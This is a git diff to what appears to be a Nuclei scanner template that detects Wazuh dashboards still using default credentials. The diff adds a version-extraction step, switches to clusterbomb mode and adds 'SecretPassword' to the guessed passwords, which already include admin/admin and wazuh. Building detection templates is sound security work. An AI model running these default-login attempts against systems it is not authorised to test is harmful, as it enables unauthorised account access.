diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index d2bd97b963..2c2c323160 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -2,33 +2,45 @@ id: wazuh-default-login info: name: Wazuh - Default Login - author: theamanrawat + author: theamanrawat,denandz,PulseSecurity.co.nz severity: high description: | Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html - https://wazuh.com + - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment metadata: verified: true - max-request: 4 + max-request: 6 shodan-query: title:"Wazuh" tags: wazuh,default-login http: + - method: GET + path: + - "{{BaseURL}}/app/login" + + extractors: + - type: regex + part: body + name: osd + group: 1 + internal: true + regex: + - '"version":"([0-9.]+)"' + - raw: - - | - GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1 - Host: {{Hostname}} - | POST /auth/login HTTP/1.1 Host: {{Hostname}} Osd-Version: {{osd}} + osd-xsrf: osd-fetch Content-Type: application/json {"username":"{{username}}","password":"{{password}}"} - attack: pitchfork + attack: clusterbomb payloads: username: - "admin" @@ -36,6 +48,7 @@ http: password: - "admin" - "wazuh" + - "SecretPassword" stop-at-first-match: true matchers-condition: and @@ -56,13 +69,3 @@ http: - type: status status: - 200 - - extractors: - - type: regex - name: osd - group: 1 - regex: - - '"version":"([0-9.]+)"' - internal: true - -# digest: 4b0a00483046022100de2c876067d0aa43fb62771bff3c3adea76873a9f0982f98856a1ed321b58d48022100a60ef9271fd209ecadc68b365c82e4176cd78fe24526dcbe7a8cd8772b0337cf:922c64590222798bb761d5b6d8e72950